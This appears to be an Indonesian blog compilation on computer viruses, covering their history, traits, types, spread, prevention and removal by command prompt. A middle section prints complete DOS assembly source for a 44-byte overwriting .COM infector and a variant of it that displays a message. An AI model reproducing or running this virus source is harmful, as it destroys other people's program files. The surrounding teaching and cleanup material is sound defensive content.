ASAL MUASAL VIRUS KOMPUTER
1949, John Von Neuman, menggungkapkan " teori self altering automata "
1960, lab BELL (AT&T), para ahli di lab BELL (AT&T) mencoba-coba teori
yang diungkapkan oleh john v neuman, mereka bermain-main dengan teori
tersebut untuk suatu jenis permainan/game. Para ahli tersebut membuat
program yang dapat memperbanyak dirinya dan dapat menghancurkan program
buatan lawan.Program yang mampu bertahan dan menghancurkan semua program
lain, maka akan dianggap sebagai pemenangnya. Permainan ini akhirnya
menjadi permainan favorit ditiap-tiap lab komputer.semakin lama mereka
pun sadar dan mulai mewaspadai permainan ini dikarenakan program yang
diciptakan makin lama makin berbahaya, sehingga mereka melakukan
pengawasan dan pengamanan yang ketat.
1980, program tersebut yang akhirnya dikenal dengan nama "virus" ini
berhasil menyebar diluar lingkungan laboratorium, dan mulai beredar di
dunia cyber.
1980, mulailah dikenal virus-virus yang menyebar di dunia cyber.
source:ujie-cap.blog
PENGERTIAN VIRUS
" A program that can infect other programs by modifying them to include
a slighty altered copy of itself.A virus can spread throughout a computer
system or network using the authorization of every user using it to
infect their programs. Every programs that gets infected can also act as
a virus that infection grows “
( Fred Cohen )
Pertama kali istilah “virus” digunakan oleh Fred Cohen pada tahun 1984 di
Amerika Serikat. Virus komputer dinamakan “Virus” karena memiliki beberapa
persamaan mendasar dengan virus pada istilah kedokteran(biological viruses).
Virus komputer bisa diartikan sebagai suatu program komputer biasa.Tetapi
memiliki perbedaan yang mendasar dengan program-program lainnya,yaitu
virus dibuat untuk menulari program-program lainnya, mengubah,
memanipulasinya bahkan sampai merusaknya. Ada yang perlu dicatat disini,
virus hanya akan menulari apabila program pemicu atau program yang telah
terinfeksi tadi dieksekusi, disinilah perbedaannya dengan "worm". Tulisan
ini tidak akan bahas worm karena nanti akan mengalihkan kita dari
pembahasan mengenai virus ini.
KRITERIA VIRUS
Suatu program yang disebut virus, baru dapat dikatakan adalah benar benar
virus apabila minimal memiliki 5 kriteria :
1. Kemampuan suatu virus untuk mendapatkan informasi
2. Kemampuannya untuk memeriksa suatu program
3. Kemampuannya untuk menggandakan diri dan menularkan
4. Kemampuannya melakukan manipulasi
5. Kemampuannya untuk menyembunyikan diri.
Sekarang akan coba dijelaskan dengan singkat apa yang dimaksud dari tiap
-tiap kemampuan itu dan mengapa ini sangat diperlukan.
1.Kemampuan untuk mendapatkan informasi
Pada umumnya suatu virus memerlukan daftar nama-nama file yang ada dalam
suatu directory, untuk apa? agar dia dapat mengenali program program apa
saja yang akan dia tulari,semisal virus makro yang akan menginfeksi semua
file berekstensi *.doc setelah virus itu menemukannya, disinilah kemampuan
mengumpulkan informasi itu diperlukan agar virus dapat membuat daftar/
data semua file, terus memilahnya dengan mencari file-file yang bisa
ditulari.Biasanya data ini tercipta saat program yang tertular/terinfeksi
atau bahkan program virus ini dieksekusi. Sang virus akan segera melakukan
pengumpulan data dan menaruhnya di RAM (biasanya :P ) , sehingga apabila
komputer dimatikan semua data hilang tetapi akan tercipta setiap program
bervirus dijalankan dan biasanya dibuat sebagai hidden file oleh virus .
2.Kemampuan memeriksa suatu program
Suatu virus juga harus bias untuk memeriksa suatu program yang akan
ditulari, misalnya ia bertugas menulari program berekstensi *.doc, dia
harus memeriksa apakah file dokumen ini telah terinfeksi ataupun belum,
karena jika sudah maka dia akan percuma menularinya 2 kali. Ini sangat
berguna untuk meningkatkan kemampuan suatu virus dalam hal kecepatan
menginfeksi suatu file/program.Yang umum dilakukan oleh virus adalah
memiliki/ memberi tanda pada file/program yang telah terinfeksi
sehingga mudah untuk dikenali oleh virus tersebut . Contoh penandaan
adalah misalnya memberikan suatu byte yang unik disetiap file yang
telah terinfeksi.
3.Kemampuan untuk menggandakan diri
Kalo ini emang virus "bang-get", maksudnya tanpa ini tak adalah virus.
Inti dari virus adalah kemampuan mengandakan diri dengan cara menulari
program lainnya. Suatu virus apabila telah menemukan calon korbannya
(baik file atau program) maka ia akan mengenalinya dengan memeriksanya,
jika belum terinfeksi maka sang virus akan memulai aksinya untuk menulari
dengan cara menuliskan byte pengenal pada program/ file tersebut,dan
seterusnya mengcopikan/menulis kode objek virus diatas file/program
yang diinfeksi. Beberapa cara umum yang dilakukan oleh virus untuk
menulari/ menggandakan dirinya adalah:
a.File/Program yang akan ditulari dihapus atau diubah namanya. kemudian
diciptakan suatu file menggunakan nama itu dengan menggunakan virus
tersebut (maksudnya virus mengganti namanya dengan nama file yang dihapus)
b.Program virus yang sudah di eksekusi/load ke memori akan langsung
menulari file-file lain dengan cara menumpangi seluruh file/program
yang ada.
4.Kemampuan mengadakan manipulasi
Rutin (routine) yang dimiliki suatu virus akan dijalankan setelah virus
menulari suatu file/program. isi dari suatu rutin ini dapat beragam
mulai dari yang teringan sampai pengrusakan. rutin ini umumnya digunakan
untuk memanipulasi program ataupun mempopulerkan pembuatnya! Rutin ini
memanfaatkan kemampuan dari suatu sistem operasi (Operating System) ,
sehingga memiliki kemampuan yang sama dengan yang dimiliki sistem
operasi. misal:
a.Membuat gambar atau pesan pada monitor
b.Mengganti/mengubah ubah label dari tiap file,direktori,atau label dari
drive di pc
c.Memanipulasi program/file yang ditulari
d.Merusak program/file
e.Mengacaukan kerja printer , dsb
5.Kemampuan Menyembunyikan diri
Kemampuan Menyembunyikan diri ini harus dimiliki oleh suatu virus agar semua
pekerjaan baik dari awal sampai berhasilnya penularan dapat terlaksana.
langkah langkah yang biasa dilakukan adalah:
-Program asli/virus disimpan dalam bentuk kode mesin dan digabung dengan
program lain yang dianggap berguna oleh pemakai.
-Program virus diletakkan pada Boot Record atau track yang jarang
diperhatikan oleh komputer itu sendiri
-Program virus dibuat sependek mungkin, dan hasil file yang diinfeksi tidak
berubah ukurannya
-Virus tidak mengubah keterangan waktu suatu file
-dll
SIKLUS HIDUP VIRUS
Siklus hidup virus secara umum, melalui 4 tahap:
1. Dormant phase ( Fase Istirahat/Tidur )
Pada fase ini virus tidaklah aktif. Virus akan diaktifkan oleh suatu kondisi
tertentu, semisal:tanggal yang ditentukan,kehadiran program lain/dieksekusinya
program lain, dsb. Tidak semua virus melalui fase ini
2. Propagation phase ( Fase Penyebaran )
Pada fase ini virus akan mengkopikan dirinya kepada suatu program atau
ke suatu tempat dari media storage (baik hardisk, ram dsb). Setiap
program yang terinfeksi akan menjadi hasil “klonning” virus tersebut
(tergantung cara virus tersebut menginfeksinya)
3. Trigerring phase ( Fase Aktif )
Di fase ini virus tersebut akan aktif dan hal ini juga di picu oleh beberapa
kondisi seperti pada Dormant phase
4. Execution phase ( Fase Eksekusi )
Pada Fase inilah virus yang telah aktif tadi akan melakukan fungsinya.
Seperti menghapus file, menampilkan pesan-pesan, dsb
JENIS – JENIS VIRUS KOMPUTER
Untuk lebih mempertajam pengetahuan kita tentang virus, saya akan coba
memberikan penjelasan tentang jenis-jenis virus yang sering berkeliaran
di dunia cyber.
1.Virus Makro
Jenis Virus ini pasti sudah sangat sering kita dengar.Virus ini ditulis
dengan bahasa pemrograman dari suatu aplikasi bukan dengan bahasa
pemrograman dari suatu Operating System. Virus ini dapat berjalan apabila
aplikasi pembentuknya dapat berjalan dengan baik, maksudnya jika pada
komputer mac dapat menjalankan aplikasi word maka virus ini bekerja pada
komputer bersistem operasi Mac.
contoh virus:
-variant W97M, misal W97M.Panther
panjang 1234 bytes,
akanmenginfeksi NORMAL.DOT dan menginfeksi dokumen apabila dibuka.
-WM.Twno.A;TW
panjang 41984 bytes,
akan menginfeksi Dokumen Ms.Word yang menggunakan bahasa makro, biasanya
berekstensi *.DOT dan *.DOC
-dll
2.Virus Boot Sector
Virus Boot sector ini sudah umum sekali menyebar.Virus ini dalam menggandakan
dirinya akan memindahkan atau menggantikan boot sector asli dengan program
booting virus. Sehingga saat terjadi booting maka virus akan di load kememori
dan selanjutnya virus akan mempunyai kemampuan mengendalikan hardware standar
(ex::monitor, printer dsb) dan dari memori ini pula virus akan menyebar
eseluruh drive yang ada dan terhubung kekomputer (ex: floopy, drive lain
selain drive c).
contoh virus :
-varian virus wyx
ex: wyx.C(B) menginfeksi boot record dan floopy ;
panjang :520 bytes;
karakteristik : memory resident dan terenkripsi)
-varian V-sign :
menginfeksi : Master boot record ;
panjang 520 bytes;
karakteristik: menetap di memori (memory resident),terenkripsi, dan polymorphic)
-Stoned.june 4th/ bloody!:
menginfeksi : Master boot record dan floopy;
panjang 520 bytes;
karakteristik: menetap di memori (memory resident), terenkripsi dan menampilkan
pesan"Bloody!june 4th 1989" setelah komputer melakukan booting sebanyak 128 kali
3.Stealth Virus
Virus ini akan menguasai tabel tabel interupt pada DOS yang sering kita kenal
dengan "Interrupt interceptor" . virus ini berkemampuan untuk mengendalikan
instruksi instruksi level DOS dan biasanya mereka tersembunyi sesuai namanya
baik secara penuh ataupun ukurannya .
contoh virus:
-Yankee.XPEH.4928,
menginfeksi file *.COM dan *.EXE ;
panjang 4298 bytes;
karakteristik: menetap di memori, ukurantersembunyi, memiliki pemicu
-WXYC (yang termasuk kategori boot record pun karena masuk kategri stealth
dimasukkan pula disini), menginfeksi floopy an motherboot record;
panjang 520 bytes;
menetap di memori; ukuran dan virus tersembunyi.
-Vmem(s):
menginfeksi file file *.EXE, *.SYS, dan *.COM ;
panjang fie 3275 bytes;
karakteristik:menetap di memori, ukuran tersembunyi, di enkripsi.
-dll
4.Polymorphic Virus
Virus ini Dirancang buat mengecoh program antivirus,artinya virus ini selalu
berusaha agar tidak dikenali oleh antivirus dengan cara selalu merubah rubah
strukturnya setiap kali selesai menginfeksi file/program lain.
contoh virus:
-Necropolis A/B,
menginfeksi file *.EXE dan *.COM;
panjang file 1963 bytes;
karakteristik: menetap di memori, ukuran dan virus tesembunyi,terenkripsi dan
dapat berubah ubah struktur
-Nightfall,
menginfeksi file *.EXE;
panjang file 4554 bytes;
karakteristik : menetap di memori, ukuran dan virus tesembunyi,memiliki pemicu,
terenkripsi dan dapat berubah-ubah struktur
-dll
5.Virus File/Program
Virus ini menginfeksi file file yang dapat dieksekusi langsung dari sistem operasi,
baik itu file application (*.EXE), maupun *.COm biasanya juga hasil infeksi
dari virus ini dapat diketahui dengan berubahnya ukuran file yang diserangnya.
6.Multi Partition Virus
Virus ini merupakan gabungan dari Virus Boot sector dan Virus file : artinya
pekerjaan yang dilakukan berakibat dua, yaitu dia dapat menginfeksi file-
file *.EXE dan juga menginfeksi Boot Sector.
BEBERAPA CARA PENYEBARAN VIRUS
Virus layaknya virus biologi harus memiliki media untuk dapat menyebar,virus
computer dapat menyebar keberbagai komputer/mesin lainnya juga melalui berbagai
cara, diantaranya:
1.Flashdisk, media storage R/W
Media penyimpanan eksternal dapat menjadi sasaran empuk bagi virus untuk
dijadikan media. Baik sebagai tempat menetap ataupun sebagai media penyebarannya.
Media yang bias melakukan operasi R/W (read dan Write) sangat memungkinkan untuk
ditumpangi virus dan dijadikan sebagai media penyebaran.
2.Jaringan ( LAN, WAN,dsb)
Hubungan antara beberapa computer secara langsung sangat memungkinkan suatu
virus ikut berpindah saat terjadi pertukaran/pengeksekusian file/program
yang mengandung virus.
3.WWW (internet)
Sangat mungkin suatu situs sengaja di tanamkan suatu ‘virus’ yang akan
menginfeksi komputer-komputer yang mengaksesnya.
4.Software yang Freeware, Shareware atau bahkan Bajakan
Banyak sekali virus yang sengaja di tanamkan dalam suatu program yang di
sebarluaskan baik secara gratis, atau trial version yang tentunya sudah
tertanam virus didalamnya.
5.Attachment pada Email, transferring file
Hampir semua jenis penyebaran virus akhir-akhir ini menggunakan email attachment
dikarenakan semua pemakai jasa internet pastilah menggunakan email untuk
berkomunikasi, file-file ini sengaja dibuat mencolok/menarik perhatian, bahkan
seringkali memiliki ekstensi ganda pada penamaan filenya.
PENANGULANGANNYA
1.Langkah-Langkah untuk Pencegahan
Untuk pencegahan anda dapat melakukan beberapa langkah-langkah berikut :
> Gunakan Antivirus yang anda percayai dengan updatean terbaru, tidak
perduli apapun mereknya asalkan selalu di update, dan nyalakan Auto protect
> Selalu men-scan semua media penyimpanan eksternal yang akan di gunakan,
mungkin hal ini agak merepotkan tetapi jika Autoprotect anti virus anda
bekerja maka prosedur ini dapat dilewatkan.
> Jika Anda terhubung langsung ke Internet cobalah untuk mengkombinasikan
Antivirus anda dengan Firewall, Anti spamming, dsb
2.Langkah-Lagkah Apabila telah Terinfeksi
> Deteksi dan tentukan dimanakah kira-kira sumber virus tersebut apakah flashdisk,
jaringan, email dsb, jika anda terhubung ke jaringan maka ada baiknya anda
mengisolasi computer anda dulu (baik dengan melepas kabel atau mendisable
dari control panel)
> Identifikasi dan klasifikasikan jenis virus apa yang menyerang pc anda,
dengan cara:
- Gejala yang timbul, misal : pesan, file yang corrupt atau hilang dsb
- Scan dengan antivirus anda, jika anda terkena saat Autoprotect berjalan
berarti vius definition di computer anda tidak memiliki data virus ini,
cobalah update secara manual atau mendownload virus definitionnya untuk
anda install. Jika virus tersebut memblok usaha anda untuk mengupdatenya
maka ,upayakan untuk menggunakan media lain (komputer) dengan antivirus
updatean terbaru.
> Bersihkan, setelah anda berhasil mendeteksi dan mengenalinya maka usahakan
segera untuk mencari removal atau cara-cara untuk memusnahkannya di situs-situs
yang memberikan informasi perkembangan virus. Hal ini jika antivirusupdate-an
terbaru anda tidak berhasil memusnahkannya.
> Langkah terburuk, jika semua hal diatas tidak berhasil adalah memformat/menginstal
ulang OS komputer anda.
Cara Kerja Virus Komputer
Cara kerja Virus Komputer pada umumnya adalah menyebarkan dirinya dengan cara
antara lain menularkan file-file executable atau file-file yang bisa dijalankan langsung
dari DOS Command line. Sudah jadi sifat virus jika dia dijalankan, maka ia menulari
program aplikasi yang lain, yang di maksud menulari adalah menyalin dirinya atau
program virus tersebut ke program aplikasi lainnya, jika dalm hal ini yang tertular
adalah program Aplikasi 1, maka apabila program aplikasi 1 tersebut dijalankan, maka
program aplikasi 1 yang sudah serinfeksi virus itu akan menularkan virus pada
program aplikasi yang ke 2, maka baik program aplikasi 1 maupun 2, sudah merupakan
program pemikul bagi virus itu sendiri, yang akan menularkan seluruh program aplikasi yang ada.
Agar bisa bertindak sebagai virus komputer, sebuah program harus mempunyai 5 buah kemampuan
yang merupakan prinsip dari virus komputer. Kelima kemampuan itu adalah :
1. Kemampuan mendapatkan informasi
2. Kemampuan memeriksa program / file
3. Kemampuan menggandakan diri / menularkan
4. Kemampuan mengadakan manipulasi
5. Kemampuan menyembunyikan diri sendiri
Satu persatu kemampuan itu akan dijelaskan pada sub bab selanjutnya
1. Kemampuan mendapatkan Informasi
Pada Virus Komputer kemampuan untuk mendapatkan informasi sangat penting,
terutama informasi mengenai file yang akan diinfeksi, Virus Komputer biasanya
tidak menulari 1 program saja, tapi sekumpulan program, contohnya File-file EXE,
file-file COM, atau kedua-duanya, virus harus mendapatkan informasi tentang file tersebut
pada directory, hal-hal mengenai informasi pada file yang perlu diketahui antara lain :
1. Apakah Extensi File tersebut ( COM,EXE, BAT)
2. Apa Atribut file ( Hidden, Readonly, Archive)
3. Besar File Yang akan Di infeksi
Informasi tersebut sangat bermanfaat bagi virus, dimana informasi mengenai Extension file
berguna untuk virus yang menyerang file-file tertentu contohnya virus yang menyerang file EXE,
virus tersebut harus mencari file-file EXE yang akan ditulari.
Informasi attribut berguna untuk memberikan pilihan pada virus apakah dapat menyerang file
dengan attribut Readonly, Hidden ataukah virus harus mengeset attribut file-file tersebut
menjadi Normal, sehingga virus dapat menulari.
Informasi tentang ukuran file berguna untuk operasi matematis yang akan menghitung berapa
besar file yang sudah tertular, dimana Besar_file_terinfeksi = file_asli + Virus_size
Fungsi ini terutama dipakai oleh virus Non OverWriting. Dibawah ini cuplikan metode virus
untuk mendapatkan informasi tentang File :
Start : mov dx,offset File_to_infect ; cari seluruh file Mov ah,4Eh
Mov cx, 3 ; Attribut File ; cari host file
———
int 21h ; Dos Intrupt
cmp ax,12h ; Ada file lagi
je exit ; kalau tidak ada exit
———
file_to_infect db “*.COM” ; File yang akan diinfeksi
ends start ; akhir kode Virus
Listing 4.1. Search First File
Dimana Dx menuju ke alamat yang berisi nama file yang akan di infeksi, sedangkan disini
di gunakan DOS Interupt 21H dengan Service ah, 4EH yang berguna untuk mencari file pertama
yang cocok dengan DX ( Find First Matching File), dan mendapat kan informasi tentang file yang
berada di dalam directory, biasanya fungsi 4Eh ini selalu berpasangan dengan 4Fh, yaitu fungsi
untuk mencari file berikutnya yang cocok ( Find Next Maching File), sedangkan nilai CX,3 digunakan
untuk mengecek attribut dari file, apakah Hidden, ReadOnly, virus dapt mengeset kembali attribut
file menjadi normal, sehingga virus dapat menginfeksi file tersebut.
2. Kemampuan Untuk Memeriksa Program
Kemampuan untuk memeriksa program sangat penting bagi Virus Komputer , karena untuk mengetahui
apakah file target sudah tertular atau belum, ini sangat penting karena virus tidak akan
menularkan dirinya berkali-kali pada file yang sama, selain untuk mempercepat proses penularan
juga untuk menjaga agar file korban tidak rusak, karena apabila penularan dilakukan berulang-ulang
pada file yang sama, CRC dari file tersebut akan kacau dan menyebabkan file yang tertular tidak jalan,
biasaanya file rusak tersebut akan mengeluarkan pesan Divide Over Flow, atau Error in Exe File,
selain itu file yang berkali-kali diifeksi akan bertambah besar, dan akan mencurigakan pemakai komputer.
Berikut ini contoh listing dari kemampuan untuk memeriksa file
Mov ah, 3fh ; Baca file
Mov cx, 3 ; baca 3 byte
Mov dx,3_byte ; simpan pada buffer
Add dx,si ; Nama file
Int 21h ; Dos intrupt
Cmp a,3 ; Cek 3 byte tadi
Jnz cari_lagi ; Jika sudah tertular exit
Jmp Infect ; kalau belum , infect_file
3_byte equ $ ;data 3 byte pertama dari file asli
;yang belum tertular
infect_file : ; bagian penginfeksian
———— ; rutin infeksi
int 20h ; Dos Exit function
nop ; No Operation
Pada rutin diatas dapat dilihat bagai mana Virus Komputer memeriksa file korbannya, untuk memberikan
identitas file mana yang sudah terinfeksi maupun yang belum, karena dengan memeriksa file korban,
umumnya 3 byte pertama yang menandakan file tersebut sudah tertular / belum, 3 byte pertama tersebut
umumnya intruksi JMP : offset (Untuk file COM) , kode ‘MZ’ pada header file EXE dan PE untuk File
Aplikasi Windows.
Rutin ini sangat penting untuk menghindari penularan berkali-kali pada file korban, juga untuk
memempercepat penularan. Rutin ini dipakai oleh hampir 90 % virus komputer.
3. Kemampuan untuk menggandakan diri / Replicating
kemampuan ini merupakan inti utama dari Virus Komputer , karena virus komputer memang diprogram
untuk menularkan, dan memperbanyak dirinya. Tugas dari rutin replicating ini adalah menyebarkan
virus keseluruh system yang ditularinya, tugas dari rutin ini sangat berat karena rutin tersebut
harus mampu menyebarkan virus dengan cepat dan tidak diketahui oleh pemakai komputer, selain itu
rutin replicator harus dapat menjaga agar file yang ditularinnya tidak rusak ( Rutin untuk Virus
Appending / Non-Overwriting ), dan dapat berjalan sebagaimana mestinnya.
Cara kerja rutin replicator pada file COM lebih sederhana dari file EXE, karena struktur program EXE
yang tidak terbatas besarnya yaitu ( sebesar memory di komputer ), sedangkan file COM hanya dibatasi
sampai 64 Kb ( Base memory ). Rutin replikator pada file COM akan menditeksi dan mengcopy byte
pertama dari file yang akan ditularinya, kedalam suatu daerah di memory, rutin tersebut dipindahkan
kedalam daerah lain dalam file.
File bersih program Virus
Pada diagram diatas P1 adalah bagian pertama dari file, P2 adalah bagian kedua dari file korban.
P1 harus sama besar dengan V1 (rutin virus) , rutin virus akan menyimpan P1 dan mengcopynya pada
bagian akhir dari file.
Setelah itu virus akan mengcopykan bagian pertama dari dirinya (V1) ke bagian awal file korban.
Dimana V1 berisi instruksi JMP:V2, yaitu instruksi untuk memanggil badan Virus yang ada di belakang file korban.
Kemudian virus akan mengcopykan bagian kedunya (V2) yang merupakan badan virus ke akhir file yang
ditulari, V2 ini biasanya berisi rutin-rutin lain seperti rutin untuk pengaman, rutin untuk
melakukan aksi tertentu dan lain-lain. Rutin tersebut dapat dilihat dibawah ini :
Dalam program dapat diambil contoh 44-Virus.Com , yang merupakan virus sepanjang 44 byte,
dengan cara kerja Overwriting file Com yang ada dalam suatu directory sepanjang badan Virus
itu sendiri yaitu 44 Byte, virus ini masih sangat sederhana dan belum mempunyai rutin-rutin pengaman,
maupun kemampuan untuk memeriksa program, ataupun rutin untuk aksi-aksi tertentu , dalam contoh
dibawah ini virus hanya mempunyai kemampuan untuk menulari file Com.
Namun demikian dapat kita lihat bagaimana virus akan berkembang dengan cara menggandakan dirinya
dalam program Com.
Berikut ini listing dari 44-Virus.Asm :
________________________________________
virus segment
org 100h ; file COM
assume cs:virus
len equ offset last-100h ;Panjang virus = Akhir program – awal program
start : mov ah,04eh ; Cari file dengan kategori file COM
xor cx,cx ; cx 0, = hanya file dengan atrribut Normal
lea dx,com_mask ; Nama file COM masukan ke register DX
int 21h ; Dos Intrupt
open_file : mov ax,3d02h ; Buka file dengan mode Baca/Tulis
mov dx,9eh
Int 21h
Infect : mov cx,len ; cx diisi panjang badan virus
lea dx,start ; Masukan header Virus “V1? pada DX
Mov ah,40h ; Tulis badan virus dalam file korban
Int 21h ; Dos Intrupt
Next : mov ah,3eh ; Tutup file korban
int 21h
mov ah,4fh ; Cari file korban lagi
int 21h
jnb open_file ; Apa sudah semua file Com ? kalau belum jmp ke Open_file
; Kalau sudah semua terinfeksi Exit
com_mask: db “*.COM”,0 ; File dengan ekstensi Com
last : db 090h ; Akhir badan virus “V2?
virus ends
end start
4. Kemampuan Mengadakan Manipulasi
Kemampuan untuk mengadakan manipulasi sangat penting dilakukan oleh virus,
karena bagian ini sebetulnya yang membuat virus komputer menarik, dan
mempunyai seni dalam pembuatannya. Bagian manipulasi atau rutin manipulasi
ini banyak macamnya, dan fungsinya, suatu virus dapat mempunyai salah satu
diantara rutin-rutin manipulasi ini maupun gabungan antara rutin-rutin
manipulasi tersebut. yang pasti, makin banyak rutin manipulasi yang
dipakai oleh virus, maka akan makin besar ukuran virus yang dibuat.
Diantara rutin-rutin manipulasi yang ada, yang sering digunakan adalah :
1. Menampilkan tulisan / kata-kata / gambar
2. Membunyikan port speaker
3. Time bomb / logic Bomb
5. Kemampuan menyembunyikan diri sendiri
ini merupakan salah satu ciri virus komputer yang merupakan kemampuan untuk
mempertahankan diri agar tidak diketahui akan kehadiran dan gerak-geriknya
oleh si pemakai komputer.
6. Menampilkan Tulisan / gambar
Rutin ini yang paling banyak dipakai oleh pembuat Virus Komputer,
karena rutin ini selain untuk kepopularitas virus maupun pembuatnya,
juga akan membuat virusnya mudah dikenal oleh para pemakai komputer,
selain itu rutin ini membutuhkan suatu kreatifitas tinggi dan jiwa seni
dari pembuatnya yang akan membuat virus ini akan menarik. Listing program
dibawah ini akan memberikan contoh pembuatan rutin ini.
________________________________________
virus segment
org 100h
assume cs:virus
len equ offset last-100h ; Panjang virus = Akhir program – awal program
start : jmp mulai
msg db ‘ Modification of 44 Virus ‘,13,10
db ‘ © 2000,iwing[indovirus] ’,13,10
db ‘ – For Educational Only -$’,13,10
mulai : mov ah,09 ; Dos service 09h = Cetak String
lea dx,msg ; dx berisi pesan yang akan dicetak
int 21h ; Dos intrupt
go : mov ah,04eh ; Cari file dengan kategori file COM
xor cx,cx ; cx 0, = hanya file dengan atrribut Normal
lea dx,com_mask ; Nama file COM masukan ke register DX
int 21h ; Dos Intrupt
open_file : mov ax,3d02h ; Buka file dengan mode Baca/Tulis
mov dx,9eh
Int 21h
infect : mov cx,len ; cx diisi panjang badan virus
lea dx,start ; Masukan header Virus “V1? pada DX
mov ah,40h ; Tulis badan virus dalam file korban
Int 21h ; Dos Intrupt
Next : mov ah,3eh ; Tutup file korban
int 21h
mov ah,4fh ; Cari file korban lagi
int 21h
jnb open_file ; Apa sudah semua file Com ?,kalau belum jmp ke Open_file
; Kalau sudah semua terinfeksi Exit
com_mask: db “*.COM”,0 ; File dengan ekstensi Com
last : int 20h ; Akhir badan virus “V2?
virus ends
end start
_________________________________________
Rutin Cetak String
Pada listing program virus diatas dapat dilihat, modifikasi dari virus 44 byte
Dengan tambahan rutin untuk menampilkan string :
Modification of 44 Virus
© 2000,iwing[indovirus]
-For Educational Only –
setiap kali penularan. Disini dapat dilihat rutin yang menampilkan pesan tadi yaitu
mulai : mov ah,09 ; Dos service 09h = Cetak String
lea dx,msg ; dx berisi pesan yang akan dicetak
int 21h ; Dos intrupt
Source: Bisnus Hacker
lanjut lagi...
Hapus Virus di Flasdisk Lewat CMD/Command Prompt
Disini saya coba untuk menjelaskan sedikit cara menghapus virus yang ada di flashdisk
melalui Command Prompt. Ini juga dari hasil penelusuran saya di halaman rumah Mbah google
dan menemukan beberapa forum yang membahas ini yang akhirnya saya satukan untuk bisa
lebih jelas dan ringkas untuk dipahami. Sebenarnya sih untuk menghapus bisa aja
menggunakan anti virus yang kebanyakan orang pake. Tapi ya sudahlah langsung aja kita
bahas cara menghapus virus lewat CMD berikut..
1. Colok Flash Ddisk yg terinfeksi.
Pas nyolokin flash disk, langsung tekan + tahan tombol shift kiri untuk menonaktifkan
fungsi autorun kira-kira 5 detik setelah itu lepasin tombolnya.
2. lihat di Windows explorer, flash disknya ada di mana..? misal di F:\
3. start -> run -> ketik cmd
4. masuk ke direktori flash disk misal direktori ada di F:\
Anda tinggal mengetik "F:" (tanpa kutip)
5. ketik "attrib" (tanpa kutip)
6. biasanya virus di flash disk punya file yg namanya "autorun.inf" &
biasanya attributnya system, hidden, read only (SHR)
untuk melepas attribut itu anda ketik "attrib -s -h -r autorun.inf" (tanpa kutip)
7. setelah attribut terlepas,, baru deh di hapus...
"del autorun.inf" (tanpa kutip)
8. Nah sekarang tinggal cari virusnya (yg ini kudu pake naluri,,hehe )
karena masing-masing virus berbeda namanya.
misal nama virusnya abc.exe
9. Anda ikutin langkah no 6 tadi tapi autorun.inf nya di ganti dengan nama virus
trus di hapus pake langkah no 7 (del namavirus.exe)
10.Remove flash disk dan colokin lagi, kalau masih ada juga berarti komputer anda sudah
dihuni oleh virus juga sebelum flash disk anda colokin.
ALTERNATIF
Selain menngunakan perintah "attrib" jg bisa menggunakan perintah "taskkill" yang
gunanya untuk mematikan proses file, contoh pada kasus virus Kang.O pd tahun 2006 yang
berjalan pada system.exe
Klik [Start] [Run]
Ketik [cmd]
Matikan proses ”system.exe” dengan menggunakan perintah Taskkill dengan mengetikkan
[taskkill /f /im system.exe], dan tekan enter
source: ujie-cap
Membasmi Virus Menggunakan Command Windows
Saat komputer terjangkit virus, antivirus tentu menjadi jawaban yang paling tepat untuk
menghilangkannya. Namun, tahukah Anda bahwa virus komputer juga bisa dilenyapkan tanpa
menggunakan antivirus...?
Trik membersihkan virus tanpa antivirus ini bertujuan membasmi virus-virus baru dan
virus lokal yang kebanyakan tidak dapat dideteksi oleh antivirus dari luar. Selain dapat
mempersingkat waktu dalam men-scan virus, cara ini terbukti cukup ampuh bagi
komputer yang sering terkena virus.
Salah satu cara membersihkan virus tanpa antivirus adalah dengan menggunakan
Command Windows. Berikut adalah prosesnya.
1. Matikan virus di memori. Gunakan tools task manager, proses explore untuk menghentikan
loading virus ke memori. Cari yang aktivitasnya memakan banyak memori dan
resource CPU tinggi, kemudian [Kill Proses].
2. Tahap kedua, non-aktifkan virus di startup. Ini dilakukan agar virus tidak
terloading ke memori, sehingga kita perlu membuangnya di startup. Caranya, kita bisa
menggunakan perintah MSCONFIG, klik menu [Start] > [Run] > ketik msconfig. Setelah itu akan
tampil “System Configuration Utility”. Lalu pilihlah tab [Startup], jika bingung mana virus
dan mana yang bukan, pilih [Disable All]. Lalu aktifkan kembali startup yang diinginkan
(jika virus sudah bersih). Namun bila kita mengetahui file yang dianggap virus, sebaiknya
membuang tanda check list pada kotak bagian kiri untuk file yang dicurigai sebagai virus.
Cara ini akan menonaktifkan virus di startup. Jika msconfig diblok oleh virus, gunakan tools
dari ansav (ansav.exe). Pilih plugin, kemudian di registry fix buka menu yang diblok (showrun menu).
3. Hapus file virus dari komputer. Carilah dengan menggunakan fasilitas “search” pada Windows.
Klik menu [Start] > [Search], lalu carilah file .EXE virus (contohnya: happy.exe, data.exe,
bulubebek.exe, dll.) yang sebelumnya loading di memori atau startup. File ini biasanya disimpan
oleh pembuatnya di bagian folder Windows atau System32 dari Windows. Setelah ditemukan,
delete atau hapus file tersebut. Jika ada file yang tidak bisa dihapus, cari file apa yang
tidak bisa dihentikan, kemudian cari prosesnya menggunakan proses explorer dan kill prosesnya.
4. Hapus virus dari System Registry. Ini adalah tahap terakhir, kita perlu menggunakan
perintan REGEDIT untuk mengubah dan men-delete virus dari registry kita. Pilihlah
[Start] > [Run] > [Regedit], lalu di menu [Edit], pilihlah [Find] (tekan Ctrl + F). masukkan
nama file virus yang ingin dihapus (contohnya: happy.exe, data.exe, bulubebek.exe, dll.),
lalu pilih [Find Next]. Apabila ditemukan file virus, hapuslah semua registry yang memuat
virus tersebut berikut foldernya (kalau ada). Jika menu regedit diblok juga oleh virus,
gunakan lagi tools ansav yang di atas.
5. Kemudian lanjutkan dengan menekan tombol [F3] atau di menu pilih [Edit] terus
[Find Next]. Biasanya file virus diletakkan di beberapa tempat registry, jangan sampai
ada yang terlewatkan agar registry komputer terbebas dari loading virus tersebut.
S ebab jika tidak, pekerjaan ini akan sia-sia.
Tidak sulitkan membasmi virus tanpa antivirus? Meskipun demikian, untuk mengatasi
virus-virus macro (word, excel), virus yang merusak file (extension EXE), dan virus yang
susah dibersihkan, perlu digabung dengan penggunaan antivirus yang bagus untuk
memperbaiki file-file yang terinfeksi.
semoga bermanfaat....
source:ujie-cap & comtrack djawir
-
No comments:
Post a Comment